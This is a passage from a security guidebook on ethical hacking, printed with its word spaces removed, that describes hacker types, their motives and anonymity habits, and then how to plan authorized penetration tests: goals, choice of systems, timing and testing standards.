Scriptkiddies:Thesearecomputernoviceswhotakeadvantageoftheexploittools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyareverysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysareoftenthestereotypicalhackersthatyouhearaboutinthenewsmedia,theyneedonlyminimalskillstocarryouttheirattacks.

Criminalhackers:Oftenreferredtoas“crackers,”theseareskilledcriminalexpertswhowritesomeofthehackingtools,includingthescriptsandotherprogramsthatthescriptkiddiesandsecurityprofessionalsuse.Thesefolksalsowritemalwaretocarryouttheirexploitsfromtheothersideoftheworld.Theycanbreakintonetworksandcomputersandcovertheirtracks.Theycanevenmakeitlooklikesomeoneelsehackedtheirvictims’systems.Sometimes,peoplewithillintentmaynotbedoingwhat’sconsidered“hacking,”butnevertheless,they’reabusingtheirprivilegesorsomehowgainingunauthorizedaccess—suchasthe2015incidentinvolvingMajorLeagueBaseball’sSt.LouisCardinalsandHoustonAstros.Thus,themediaglorifiesitallas“hacking.”

Advancedhackersareoftenmembersofcollectivesthatprefertoremainnameless.Thesehackersareverysecretiveandshareinformationwiththeirsubordinates(lower-rankedhackersinthecollectives)onlywhentheyaredeemedworthy.Typically,forlower-rankedhackerstobeconsideredworthy,theymustpossesssomeuniqueinformationortakethegang-likeapproachandprovethemselvesthroughahigh-profilehack.ThesehackersarearguablysomeofyourworstenemiesinIT.(Okay,maybethey’renotasbadasuntrainedandcarelessusers,butclose.)Byunderstandingcriminalhackerbehavioryouaresimplybeingproactive—findingproblemsbeforetheybecomeproblems.

Securityresearchers:Thesepeoplearehighlytechnicalandpubliclyknownsecurityexpertswhonotonlymonitorandtrackcomputer,network,andapplication

vulnerabilitiesbutalsowritethetoolsandothercodetoexploitthem.Iftheseguysdidn’texist,securityprofessionalswouldn’thavemuchinthewayofopensourceandevencertaincommercialsecuritytestingtools.Ifollowmanyofthesesecurityresearchersonaweeklybasisviatheirblogs,Twitter,andarticles,andyoushould,too.Youcanreviewmyblog(http://securityonwheels.blogspot.com),andIlistothersourcesthatyoucanbenefitfromintheAppendix.Followingtheprogressofthesesecurityresearchershelpsyoustayup-to-dateonbothvulnerabilitiesandthelatestandgreatestsecuritytools.IlistthetoolsandrelatedresourcesfromvarioussecurityresearchersintheAppendixandthroughoutthebook.

Therearegood-guy(whitehat)andbad-guy(blackhat)hackers.Grayhathackersarealittlebitofboth.Therearealsoblue-hathackerswhoareinvitedbysoftwaredeveloperstofindsecurityflawsintheirsystems.

IoncesawastudyfromtheBlackHatsecurityconferencethatfoundthateverydayITprofessionalsevenengageinmaliciousandcriminalactivityagainstothers.AndpeoplewonderwhyITdoesn’tgettherespectitdeserves!Perhapsthisgroupwillevolveintoafourthgeneralcategoryofhackersinthecomingyears.

Regardlessofageandcomplexion,hackerspossesscuriosity,bravado,andoftenverysharpminds.

Perhapsmoreimportantthanahacker’sskilllevelishisorhermotivation:

Hacktiviststrytodisseminatepoliticalorsocialmessagesthroughtheirwork.Ahacktivistwantstoraisepublicawarenessofanissueyettheywanttoremainanonymous.Inmanysituations,thesehackerswilltrytotakeyoudownifyouexpressaviewthat’scontrarytotheirs.ExamplesofhacktivismarethewebsitesthatweredefacedwiththeFreeKevinmessagesthatpromotedfreeingKevinMitnickfromprisonforhisfamoushackingescapades.Otherscasesofhacktivismincludemessagesaboutlegalizingdrugs,protestsagainstthewar,protestscenteredaroundwealthenvyandbigcorporations,andjustaboutanyothersocialandpoliticalissueyoucanthinkof.Cyberterrorists(bothorganizedandunorganized,oftenbackedbygovernmentagencies)attackcorporateorgovernmentcomputersandpublicutilityinfrastructures,suchaspowergridsandair-trafficcontroltowers.Theycrashcriticalsystems,stealclassifieddata,orexposethepersonalinformationofgovernmentemployees.Countriestakethethreatsthesecyberterroristsposesoseriouslythatmanymandateinformationsecuritycontrolsincrucialindustries,suchasthepowerindustry,toprotectessentialsystemsagainsttheseattacks.HackersforhirearepartoforganizedcrimeontheInternet.ManyofthesehackershireoutthemselvesortheirDoS-creatingbotnetsformoney—andlotsofit!

http://securityonwheels.blogspot.com

Criminalhackersareintheminority,sodon’tthinkthatyou’reupagainstmillionsofthesevillains.Likethee-mailspamkingsoftheworld,manyofthenefariousactsfrommembersofcollectivesthatprefertoremainnamelessarecarriedoutbyasmallnumberofcriminals.Manyotherhackersjustlovetotinkerandonlyseekknowledgeofhowcomputersystemswork.Oneofyourgreatestthreatsworksinsideyourbuildingandhasanaccessbadgetothebuildingandavalidnetworkaccount,sodon’tdiscounttheinsiderthreat.

WhyTheyDoItHackershackbecausetheycan.Period.Okay,itgoesalittledeeperthanthat.Hackingisacasualhobbyforsomehackers—theyhackjusttoseewhattheycanandcan’tbreakinto,usuallytestingonlytheirownsystems.Thesearen’tthefolksIwriteaboutinthisbook.Ifocusonthosehackerswhoareobsessiveaboutgainingnotorietyordefeatingcomputersystems,andthosewhohavecriminalintentions.

ManyhackersgetakickoutofoutsmartingcorporateandgovernmentITandsecurityadministrators.Theythriveonmakingheadlinesandbeingnotorious.Defeatinganentityorpossessingknowledgethatfewotherpeoplehavemakesthemfeelbetteraboutthemselves,buildingtheirself-esteem.Manyofthesehackersfeedofftheinstantgratificationofexploitingacomputersystem.Theybecomeobsessedwiththisfeeling.Somehackerscan’tresisttheadrenalinerushtheygetfrombreakingintosomeoneelse’ssystems.Often,themoredifficultthejobis,thegreaterthethrillisforhackers.

It’sabitironicgiventheircollectivetendenciesbuthackersoftenpromoteindividualism—oratleastthedecentralizationofinformation—becausemanybelievethatallinformationshouldbefree.Theythinktheirattacksaredifferentfromattacksintherealworld.Hackersmayeasilyignoreormisunderstandtheirvictimsandtheconsequencesofhacking.Theydon’tthinklong-termaboutthechoicesthey’remakingtoday.Manyhackerssaytheydon’tintendtoharmorprofitthroughtheirbaddeeds,abeliefthathelpsthemjustifytheirwork.Manydon’tlookfortangiblepayoffs.Justprovingapointisoftenasufficientrewardforthem.Thewordsociopathcomestomind.

Theknowledgethatmaliciousattackersgainandtheself-esteemboostthatcomesfromsuccessfulhackingmightbecomeanaddictionandawayoflife.Someattackerswanttomakeyourlifemiserable,andotherssimplywanttobeseenorheard.Somecommonmotivesarerevenge,basicbraggingrights,curiosity,boredom,challenge,vandalism,theftforfinancialgain,sabotage,blackmail,extortion,corporateespionage,andjustgenerallyspeakingoutagainst“theman.”Hackersregularlycitethesemotivestoexplaintheirbehavior,butthesemotivationstendtobecitedmorecommonlyduringdifficulteconomicconditions.

Malicioususersinsideyournetworkmaybelookingtogaininformationtohelpthemwithpersonalfinancialproblems,togivethemalegupoveracompetitor,toseekrevengeontheiremployers,tosatisfytheircuriosity,ortorelieveboredom.

Manybusinessownersandmanagers—evensomenetworkandsecurityadministrators—believethattheydon’thaveanythingthatahackerwantsorthathackerscan’tdomuchdamageiftheybreakin.They’resorelymistaken.Thisdismissivekindofthinkinghelpssupportthebadguysandpromotetheirobjectives.Hackerscancompromiseaseeminglyunimportantsystemtoaccessthenetworkanduseitasalaunchingpadforattacksonothersystems,andmany

peoplewouldbenonethewiserbecausetheydon’thavethepropercontrolstopreventanddetectmalicioususe.

Rememberthathackersoftenhacksimplybecausetheycan.Somehackersgoforhigh-profilesystems,buthackingintoanyone’ssystemhelpsthemfitintohackercircles.Hackersexploitmanypeople’sfalsesenseofsecurityandgoforalmostanysystemtheythinktheycancompromise.Electronicinformationcanbeinmorethanoneplaceatthesametime,soifhackersmerelycopyinformationfromthesystemstheybreakinto,it’stoughtoprovethathackerspossessthatinformationandit’simpossibletogetitback.

Similarly,hackersknowthatasimpledefacedwebpage—howevereasilyattacked—isnotgoodforsomeoneelse’sbusiness.Itoftentakesalarge-scaledatabreach;however,hackedsitescanoftenpersuademanagementandothernonbelieverstoaddressinformationthreatsandvulnerabilities.

Manyrecentstudieshaverevealedthatmostsecurityflawsareverybasicinnature.That’sexactlywhatIseeinmyinformationsecurityassessments.Icallthesebasicflawsthelow-hangingfruitofthenetworkjustwaitingtobeexploited.Computerbreachescontinuetogeteasiertoexecuteyethardertopreventforseveralreasons:

WidespreaduseofnetworksandInternetconnectivityAnonymityprovidedbycomputersystemsworkingovertheInternetandoftenontheinternalnetwork(becauseeffectivelogging,monitoring,andalertingrarelytakesplace)GreaternumberandavailabilityofhackingtoolsLargenumberofopenwirelessnetworksthathelphackerscovertheirtracksGreatercomplexityofnetworksandthecodebasesintheapplicationsanddatabasesbeingdevelopedtodayComputer-savvychildrenUnlikelinessthatattackerswillbeinvestigatedorprosecutedifcaught

AmalicioushackeronlyneedstofindonesecurityholewhereasITandsecurityprofessionalsandbusinessownersmustfindandblockthemall!

Althoughmanyattacksgounnoticedorunreported,criminalswhoarediscoveredareoftennotpursuedorprosecuted.Whenthey’recaught,hackersoftenrationalizetheirservicesasbeingaltruisticandabenefittosociety:They’remerelypointingoutvulnerabilitiesbeforesomeoneelsedoes.Regardless,ifhackersarecaughtandprosecuted,the“fameandglory”rewardsystemthathackersthriveonisthreatened.

Thesamegoesformalicioususers.Typically,theircriminalactivitygoesunnoticed,butifthey’recaught,thesecuritybreachmaybekepthush-hushinthenameofshareholdervalueornotwantingtoruffleanycustomerorbusinesspartnerfeathers.

However,informationsecurityandprivacylawsandregulationsarechangingthisbecauseinmostsituationsbreachnotificationisrequired.Sometimes,thepersonisfiredoraskedtoresign.Althoughpubliccasesofinternalbreachesarebecomingmorecommon(usuallythroughbreachdisclosurelaws),thesecasesdon’tgiveafullpictureofwhat’sreallytakingplaceintheaverageorganization.

Whetherornottheywantto,mostexecutivesnowhavetodealwithallthestate,federal,andinternationallawsandregulationsthatrequirenotificationsofbreachesorsuspectedbreachesofsensitiveinformation.Thisappliestoexternalhacks,internalbreaches,andevensomethingasseeminglybenignasalostmobiledeviceorbackuptapes.TheAppendixcontainsURLstotheinformationsecurityandprivacylawsandregulationsthatmayaffectyourbusiness.

Hackinginthenameofliberty?Manyhackersexhibitbehaviorsthatcontradicttheirstatedpurposes—thatis,theyfightforcivillibertiesandwanttobeleftalone,whileatthesametime,theylovepryingintothebusinessofothersandcontrollingtheminanywaypossible.Manyhackerscallthemselvescivillibertariansandclaimtosupporttheprinciplesofpersonalprivacyandfreedom.However,theycontradicttheirwordsbyintrudingontheprivacyandpropertyofothers.Theyoftenstealthepropertyandviolatetherightsofothers,butarewillingtogotogreatlengthstogettheirownrightsbackfromanyonewhothreatensthem.It’sliveandletlivegoneawry.

ThecaseinvolvingcopyrightedmaterialsandtheRecordingIndustryAssociationofAmerica(RIAA)isaclassicexample.Hackershavegonetogreatlengthstoproveapoint,fromdefacingthewebsitesoforganizationsthatsupportcopyrightsandthenendupillegallysharingmusicandsoftwarethemselves.Gofigure.

PlanningandPerformingAttacksAttackstylesvarywidely:

Somehackerspreparefarinadvanceofanattack.Theygathersmallbitsofinformationandmethodicallycarryouttheirhacks,asIoutlineinChapter4.Thesehackersarethemostdifficulttotrack.Otherhackers—usuallytheinexperiencedscriptkiddies—actbeforetheythinkthroughtheconsequences.Suchhackersmaytry,forexample,totelnetdirectlyintoanorganization’srouterwithouthidingtheiridentities.OtherhackersmaytrytolaunchaDoSattackagainstaMicrosoftExchangeserverwithoutfirstdeterminingtheversionofExchangeorthepatchesthatareinstalled.Thesehackersusuallyarecaught,oratleastblocked.Malicioususersarealloverthemap.SomecanbequitesavvybasedontheirknowledgeofthenetworkandofhowITandsecurityoperatesinsidetheorganization.Othersgopokingandproddingaroundintosystemstheyshouldn’tbein—orshouldn’thavehadaccesstointhefirstplace—andoftendostupidthingsthatleadsecurityornetworkadministratorsbacktothem.

Althoughthehackerundergroundisacommunity,manyofthehackers—especiallyadvancedhackers—don’tshareinformationwiththecrowd.Mosthackersdomuchoftheirworkindependentlyinordertoremainanonymous.

Hackerswhonetworkwithoneanotheroftenuseprivatemessageboards,anonymouse-mailaddresses,hackerwebsites,andInternetRelayChat(IRC).Youcanlogintomanyofthesesitestoseewhathackersaredoing.

Whateverapproachtheytake,mostmaliciousattackerspreyonignorance.Theyknowthefollowingaspectsofreal-worldsecurity:

Themajorityofcomputersystemsaren’tmanagedproperly.Thecomputersystemsaren’tproperlypatched,hardened,ormonitored.Attackerscanoftenflybelowtheradaroftheaveragefirewallorintrusionpreventionsystem(IPS).Thisisespeciallytrueformalicioususerswhoseactionsareoftennotmonitoredatallwhile,atthesametime,theyhavefullaccesstotheveryenvironmenttheycanexploit.Mostnetworkandsecurityadministratorssimplycan’tkeepupwiththedelugeofnewvulnerabilitiesandattackmethods.Thesepeopleoftenhavetoomanytaskstostayontopofandtoomanyotherfirestoputout.Networkandsecurityadministratorsmayalsofailtonoticeorrespondtosecurityeventsbecauseofpoortimeandgoalmanagement.IprovideresourcesontimeandgoalmanagementforITandsecurityprofessionalsintheAppendix.

Informationsystemsgrowmorecomplexeveryyear.Thisisyetanotherreasonwhyoverburdenedadministratorsfinditdifficulttoknowwhat’shappeningacrossthewireandontheharddrivesofalltheirsystems.Virtualization,cloudservices,andmobiledevicessuchaslaptops,tablets,andphonesaremakingthingsexponentiallyworse.

Timeisanattacker’sfriend—andit’salmostalwaysonhisorherside.Byattackingthroughcomputersratherthaninperson,hackershavemorecontroloverthetimingfortheirattacks:

Attackscanbecarriedoutslowly,makingthemhardtodetect.Attacksarefrequentlycarriedoutaftertypicalbusinesshours,ofteninthemiddleofthenight,andfromhome,inthecaseofmalicioususers.Defensesareoftenweakerafterhours—withlessphysicalsecurityandlessintrusionmonitoring—whenthetypicalnetworkadministrator(orsecurityguard)issleeping.

Ifyouwantdetailedinformationonhowsomehackersworkorwanttokeepupwiththelatesthackermethods,severalmagazinesareworthcheckingout:

2600—TheHackerQuarterlymagazine(www.2600.com)(IN)SECUREmagazine(www.net-security.org/insecuremag.php)Hackin9(http://hakin9.org)PHRACK(www.phrack.org/archives)

Maliciousattackersusuallylearnfromtheirmistakes.Everymistakemovesthemonestepclosertobreakingintosomeone’ssystem.Theyusethisknowledgewhencarryingoutfutureattacks.You,asasecurityprofessionalresponsiblefortestingthesecurityofyourenvironment,needtodothesame.

http://www.2600.com/

http://www.net-security.org/insecuremag.php

http://hakin9.org

http://www.phrack.org/archives/

MaintainingAnonymitySmartattackerswanttoremainaslow-keyaspossible.Coveringtheirtracksisapriority,andmanytimestheirsuccessdependsonthemremainingunnoticed.Theywanttoavoidraisingsuspicionsotheycancomebackandaccessthesystemsinthefuture.Hackersoftenremainanonymousbyusingoneofthefollowingresources:

BorrowedorstolenremotedesktopandVPNaccountsfromfriendsorpreviousemployersPubliccomputersatlibraries,schools,orkiosksatthelocalmallOpenwirelessnetworksInternetproxyserversoranonymizerservicesAnonymousordisposablee-mailaccountsfromfreee-mailservicesOpene-mailrelaysInfectedcomputers—alsocalledzombiesorbots—atotherorganizationsWorkstationsorserversonthevictim’sownnetwork

Ifhackersuseenoughsteppingstonesfortheirattacks,theyarehard—practicallyimpossible—totrace.Luckily,oneofyourbiggestconcerns—themalicioususer—generallyisn’tquiteassavvy.Thatis,unlesstheuserisanactualnetworkorsecurityadministrator.

Chapter3

DevelopingYourEthicalHackingPlanInThisChapter

Settingsecuritytestinggoals

Selectingwhichsystemstotest

Developingyourtestingstandards

Examininghackingtools

Asaninformationsecurityprofessional,youmustplanyoursecurityassessmenteffortsbeforeyoustart.Adetailedplandoesn’tmeanthatyourtestingmustbeelaborate.Itjustmeansthatyou’reclearandconciseaboutwhattodo.Giventheseriousnessofethicalhacking,youshouldmakethisprocessasstructuredaspossible.

Evenifyoutestonlyasinglewebapplicationorworkgroupofcomputers,besuretotakethecriticalstepsofestablishingyourgoals,defininganddocumentingthescopeofwhatyou’llbetesting,determiningyourtestingstandards,andgatheringandfamiliarizingyourselfwiththepropertoolsforthetask.Thischaptercoversthesestepstohelpyoucreateapositiveenvironmentsoyoucansetyourselfupforsuccess.

Doyouneedinsurance?Ifyou’reanindependentconsultantorhaveabusinesswithateamofsecurityassessmentprofessionals,considergettingprofessionalliabilityinsurance(alsoknownaserrorsandomissionsinsurance)fromanagentwhospecializesinbusinessinsurancecoverage.Thiskindofinsurancecanbeexpensivebutwillbewellworththeexpenseifsomethinggoesawryandyouneedprotection.Manycustomersevenrequiretheinsurancebeforethey’llhireyoutodothework.

EstablishingYourGoalsYoucan’thitatargetyoucan’tsee.Yourtestingplanneedsgoals.Themaingoalofethicalhackingistofindvulnerabilitiesinyoursystemsfromtheperspectiveofthebadguyssoyoucanmakeyourenvironmentmoresecure.Youcanthentakethisastepfurther:

Definemorespecificgoals.Alignthesegoalswithyourbusinessobjectives.Whatareyouandthemanagementtryingtogetfromthisprocess?Whatperformancecriteriawillyouusetoensureyou’regettingthemostoutofyourtesting?Createaspecificschedulewithstartandenddatesaswellasthetimesyourtestingistotakeplace.Thesedatesandtimesarecriticalcomponentsofyouroverallplan.

Beforeyoubeginanytesting,youabsolutely,positivelyneedeverythinginwritingandapproved.Documenteverythingandinvolvemanagementinthisprocess.Yourbestallyinyourtestingeffortsisamanagerwhosupportswhatyou’redoing.

Thefollowingquestionscanstarttheballrollingwhenyoudefinethegoalsforyourethicalhackingplan:

DoesyourtestingsupportthemissionofthebusinessanditsITandsecuritydepartments?Whatbusinessgoalsaremetbyperformingethicalhacking?Thesegoalsmayincludethefollowing:

WorkingthroughStatementonStandardsforAttestationEngagements(SSAE)16auditsMeetingfederalregulationssuchastheHealthInsurancePortabilityandAccountabilityAct(HIPAA)andthePaymentCardIndustryDataSecurityStandard(PCIDSS)MeetingcontractualrequirementsofclientsorbusinesspartnersMaintainingthecompany’simagePreppingfortheinternationallyacceptedsecuritystandardofISO/IEC27001:2013

Howwillthistestingimprovesecurity,IT,andthebusinessasawhole?Whatinformationareyouprotecting?Thiscouldbepersonalhealthinformation,intellectualproperty,confidentialclientinformation,oremployees’privateinformation.Howmuchmoney,time,andeffortareyouandyourorganizationwillingto

spendonsecurityassessments?Whatspecificdeliverableswilltherebe?Deliverablescanincludeanythingfromhigh-levelexecutivereportstodetailedtechnicalreportsandwrite-upsonwhatyoutested,alongwiththeoutcomesofyourtests.Youcandeliverspecificinformationthatisgleanedduringyourtesting,suchaspasswordsandotherconfidentialinformation.Whatspecificoutcomesdoyouwant?Desiredoutcomesincludethejustificationforhiringoroutsourcingsecuritypersonnel,increasingyoursecuritybudget,meetingcompliancerequirements,orenhancingsecuritysystems.

Afteryouknowyourgoals,documentthestepstogetthere.Forexample,ifonegoalistodevelopacompetitiveadvantagetokeepexistingcustomersandattractnewones,determinetheanswerstothesequestions:

Whenwillyoustartyourtesting?Willyourtestingapproachbeblind,inwhichyouknownothingaboutthesystemsyou’retesting,orknowledge-based,inwhichyou’regivenspecificinformationaboutthesystemsyou’retesting,suchasIPaddresses,hostnames,andevenusernamesandpasswords?Irecommendthelatter.Willyourtestingbetechnicalinnature,involvephysicalsecurityassessments,orevenusesocialengineering?Willyoubepartofalargerethicalhackingteam,sometimescalledatigerteamorredteam?

Willyounotifytheaffectedpartiesofwhatyou’redoingandwhenyou’redoingit?Ifso,how?

Customernotificationisacriticalissue.Manycustomersappreciatethatyou’retakingstepstoprotecttheirinformation.Approachthetestinginapositiveway.Don’tsay,“We’rebreakingintoourownsystemstoseewhatinformationisvulnerabletohackers,”evenifthat’swhatyou’redoing.Instead,saythatyou’reassessingtheoverallsecurityofyournetworkenvironmentsotheinformationwillbeassecureaspossible.

Howwillyouknowwhethercustomersevencareaboutwhatyou’redoing?Howwillyounotifycustomersthattheorganizationistakingstepstoenhancethesecurityoftheirinformation?Whatmeasurementscanensurethattheseeffortsarepayingoff?

Establishingyourgoalstakestime,butyouwon’tregretit.Thesegoalsareyourroadmap.Ifyouhaveanyconcerns,refertothesegoalstomakesurethatyoustayontrack.AdditionalresourcesongoalsettingandmanagementcanbefoundintheAppendix.

DeterminingWhichSystemstoHackAfteryou’veestablishedyouroverallgoals,decidewhichsystemstotest.Youprobablydon’twant—orneed—toassessthesecurityofallyoursystemsatthesametime.Assessingthesecurityofallyoursystemscouldbequiteanundertakingandmightleadtoproblems.I’mnotrecommendingthatyoudon’teventuallyassesseverycomputerandapplicationyouhave.I’mjustsuggestingthatwheneverpossible,youshouldbreakyourprojectsintosmallerchunkstomakethemmoremanageable.Youmightdecidewhichsystemstotestbasedonahigh-levelriskanalysis,answeringquestionssuchas

Whatareyourmostcriticalsystems?Whichsystems,ifaccessedwithoutauthorization,wouldcausethemosttroubleorsufferthegreatestlosses?Whichsystemsappearmostvulnerabletoattack?Whichsystemscrashthemost?Whichsystemsarenotdocumented,arerarelyadministered,oraretheonesyouknowtheleastabout?

Thefollowinglistincludesdevices,systems,andapplicationsthatyoumayconsiderperformingyourhackingtestson:

RoutersandswitchesFirewallsWirelessaccesspointsWebapplications(bothinternalandhostedinthecloud)ApplicationanddatabaseserversE-mailandfileserversMobiledevices(suchasphonesandtablets)thatstoreconfidentialinformationPhysicalsecuritycamerasandaccesscontrolsystemsSCADAandindustrialcontrolsystemsWorkstationandserveroperatingsystems

Whatspecificsystemsyoushouldtestdependsonseveralfactors.Ifyouhaveasmallnetwork,youcantesteverything.Considertestingjustpublic-facinghostssuchase-mailandwebserversandtheirassociatedapplications.Theethicalhackingprocessisflexible.Basethesedecisionsonwhatmakesthemostbusinesssense.

Startwiththemostvulnerablesystemsandconsiderthesefactors:

WhetherthecomputerorapplicationresidesonthenetworkorinthecloudWhichoperatingsystemandapplication(s)thesystemruns

Theamountortypeofcriticalinformationstoredonthesystem

AttacktreeanalysisAttacktreeanalysisistheprocessofcreatingaflowchart-typemappingofhowmaliciousattackerswouldattackasystem.Attacktreesaretypicallyusedinhigher-levelinformationriskanalysesandbysecurity-savvydevelopmentteamswhenplanningoutanewsoftwareproject.Ifyoureallywanttotakeyoursecuritytestingtothenextlevelbythoroughlyplanningyourattacks,workingverymethodically,andbeingmoreprofessionaltoboot,thenattacktreeanalysisisjustthetoolyouneed.

Theonlydrawbackisthatattacktreescantakeconsiderabletimetodrawoutandrequireafairamountofexpertise.Whysweatit,though,whenyoucanuseacomputertodoalotoftheworkforyou?AcommercialtoolcalledSecurITree,byAmenazaTechnologiesLimited(www.amenaza.com),specializesinattacktreeanalysis,andyoumayconsideraddingittoyourtoolbox.Ofcourse,youcouldalsouseMicrosoftVisioorSmartDraw(www.smartdraw.com).ThefollowingfigureshowsasampleSecurITreeattacktreeanalysis.

Aprevioussecurityriskassessment,vulnerabilitytest,orbusinessimpactanalysismayalreadyhavegeneratedanswerstotheprecedingquestions.Ifso,thatdocumentationcanhelpidentifysystemsforfurthertesting.BowTieandFailureModesandEffectsAnalysis(FMEA)areadditionalapproaches.

Ethicalhackinggoesafewstepsdeeperthanhigher-levelinformationriskassessmentsand,especially,vulnerabilityscans.Withethicalhacking,youoftenstartbygleaninginformationonallsystems—includingtheorganizationasawhole—andthenfurtherassessingthemostvulnerablesystems.Butagain,thisprocessisflexible.IdiscusstheethicalhackingmethodologyinChapter4.

Anotherfactorthatwillhelpyoudecidewheretostartistoassessthesystemsthathavethegreatestvisibility.Forexample,focusingonadatabaseorfileserverthatstoresclientorothercriticalinformationmaymakemoresense—atleastinitially—thanconcentratingonafirewallorwebserverthathostsmarketinginformationaboutthe

http://www.amenaza.com/

http://www.smartdraw.com

company.

CreatingTestingStandardsOnemiscommunicationorslip-upcansendthesystemscrashingduringyourethicalhackingtests.Noonewantsthattohappen.Topreventmishaps,developanddocumenttestingstandards.Thesestandardsshouldinclude

Whenthetestsareperformed,alongwiththeoveralltimelineWhichtestsareperformedHowmuchknowledgeofthesystemsyouacquireinadvanceHowthetestsareperformedandfromwhatsourceIPaddresses(ifperformedviaanexternalsourceviatheInternet)Whatyoudowhenamajorvulnerabilityisdiscovered

Thisisalistofgeneralbestpractices—youcanapplymorestandardsforyoursituation.Thefollowingsectionsdescribethesegeneralbestpracticesinmoredetail.

TimingTheysaythatit’s“allinthetiming.”Thisisespeciallytruewhenperformingsecuritytests.Makesurethatthetestsyouperformminimizedisruptiontobusinessprocesses,informationsystems,andpeople.Youwanttoavoidharmfulsituationssuchasmiscommunicatingthetimingoftestsandcausingadenialofservice(DoS)attackagainstahigh-traffice-commercesiteinthemiddleofthedayorperformingpassword-crackingtestsinthemiddleofthenight.It’samazingwhata12-hourtimedifference(2p.m.duringmajorproductionversus2a.m.duringaslowerperiod)canmakewhentestingyoursystems!Evenhavingpeopleindifferenttimezonescancreateissues.Everyoneontheprojectneedstoagreeonadetailedtimelinebeforeyoubegin.Havingtheteammembers’agreementputseveryoneonthesamepageandsetscorrectexpectations.

Ifpossibleandpractical,notifyyourInternetserviceproviders(ISPs),cloudserviceproviders,orhostingcollocation(colo)providers.Thesecompanieshavefirewallsorintrusionpreventionsystems(IPS)inplacetodetectmaliciousbehavior.Ifyourproviderknowsyou’reconductingtests,it’slesslikelytoblockyourtraffic.

Yourtestingtimelineshouldincludespecificshort-termdatesandtimesofeachtest,thestartandenddates,andanyspecificmilestonesinbetween.YoucandevelopandenteryourtimelineintoasimplespreadsheetorGanttchart,orinalargerprojectplan.Atimelinesuchasthefollowingkeepsthingssimpleandprovidesareferenceduringtesting:

TestPerformed StartTime ProjectedEndTime

Webapplicationvulnerabilityscanning July1,21:00 July2,07:00

OSvulnerabilityscanning July2,10:00 July3,02:00

OSvulnerabilityexploitation July3,08:00 July3,17:00

RunningspecifictestsYoumighthavebeenchargedwithperformingageneralpenetrationtest,oryoumaywanttoperformspecifictests,suchascrackingpasswordsortryingtogainaccesstoawebapplication.OryoumightbeperformingasocialengineeringtestorassessingWindowsonthenetwork.Howeveryoutest,youmightnotwanttorevealthespecificsofthetesting.Evenwhenyourmanagerorclientdoesn’trequiredetailedrecordsofyourtests,documentwhatyou’redoingatahighlevel.Documentingyourtestingcanhelpeliminateanypotentialmiscommunicationandkeepyououtofhotwater.Itmightalsobeneededasevidenceshouldyouuncovermalfeasance.

Enablingloggingonthesystemsyoutestalongwiththetoolsyouusecanprovideevidenceofwhatandwhenyoutestandmore.Itmaybeoverkill,butyoucouldevenrecordscreenactionsusingatoolsuchasTechSmith’sCamtasiaStudio(www.techsmith.com/camtasia.html).

Sometimes,youmightknowthegeneralteststhatyouperform,butifyouuseautomatedtools,itmaybenexttoimpossibletounderstandeverytestyouperformcompletely.Thisisespeciallytruewhenthesoftwareyou’reusingreceivesreal-timevulnerabilityupdatesandpatchesfromthevendoreachtimeyourunit.Thepotentialforfrequentupdatesunderscorestheimportanceofreadingthedocumentationandreadmefilesthatcomewiththetoolsyouuse.

Anupdatedprogramoncebitme.Iwasperformingavulnerabilityscanonaclient’swebsite—thesametestIperformedthepreviousweek.TheclientandIhadscheduledthetestdateandtimeinadvance.ButIdidn’tknowthatthesoftwarevendormadesomechangestoitswebformsubmissiontests,andIaccidentallyfloodedtheclient’swebapplication,creatingaDoScondition.

Luckily,thisDoSconditionoccurredafterbusinesshoursanddidn’taffecttheclient’soperations.However,theclient’swebapplicationwascodedtogenerateane-mailforeveryformsubmissionandtherewasnoCAPTCHAonthepagetolimitsuccessivesubmissions.Theapplicationdeveloperandcompany’spresidentreceived4,000e-mailsintheirinboxeswithinabout10minutes—ouch!

Myexperienceisaperfectexampleofnotknowinghowmytoolwasconfiguredbydefaultandwhatitwoulddointhatsituation.Iwasluckythatthepresidentwastech-savvyandunderstoodthesituation.Remembertohaveacontingencyplanincaseasituationlikemineoccurs.Justasimportant,setpeople’sexpectationsthattroublecan

http://www.techsmith.com/camtasia.html

occur—evenwhenyou’vetakenalltherightstepstoensureeverything’sincheck.

BlindversusknowledgeassessmentsHavingsomeknowledgeofthesystemsyou’retestingisgenerallythebestapproach,butit’snotrequired.Havingabasicunderstandingofthesystemsyouhackcanprotectyouandothers.Obtainingthisknowledgeshouldn’tbedifficultifyou’retestingyourownin-housesystems.Ifyou’retestingaclient’ssystems,youmighthavetodigalittledeeperintohowthesystemsworksoyou’refamiliarwiththem.DoingsohasalwaysbeenmypracticeandI’veonlyhadasmallnumberofclientsaskforafullblindassessmentbecausemostpeoplearescaredofthem.Thisdoesn’tmeanthatblindassessmentsaren’tvaluable,butthetypeofassessmentyoucarryoutdependsonyourspecificneeds.

Thebestapproachistoplanonunlimitedattacks,whereinanytestisfairgame,possiblyevenincludingDoStesting.Thebadguysaren’tpokingaroundonyoursystemswithinalimitedscope,sowhyshouldyou?

Considerwhetherthetestsshouldbeperformedsothatthey’reundetectedbynetworkadministratorsandanymanagedsecurityserviceprovidersorrelatedvendors.Thoughnotrequired,thispracticeshouldbeconsidered,especiallyforsocialengineeringandphysicalsecuritytests.IoutlinespecifictestsforthosesubjectsinChapters6and7.

Iftoomanyinsidersknowaboutyourtesting,theymightcreateafalsesenseofvigilancebyimprovingtheirhabits,whichcanendupnegatingthehardworkyouputintothetesting.Thisdoesn’tmeanyoushouldn’ttellanyone.It’salmostalwaysagoodideatoinformtheownerofthesystemwhomaynotbeyoursponsor.Alwayshaveamainpointofcontact—preferablysomeonewithdecision-makingauthority.

PickingyourlocationThetestsyouperformdictatewhereyoumustrunthemfrom.Yourgoalistotestyoursystemsfromlocationsaccessiblebymalicioushackersorinsiders.Youcan’tpredictwhetheryou’llbeattackedbysomeoneinsideoroutsideyournetwork,socoverallyourbasesasmuchasyoucan.Combineexternal(publicInternet)testsandinternal(privateLAN)tests.

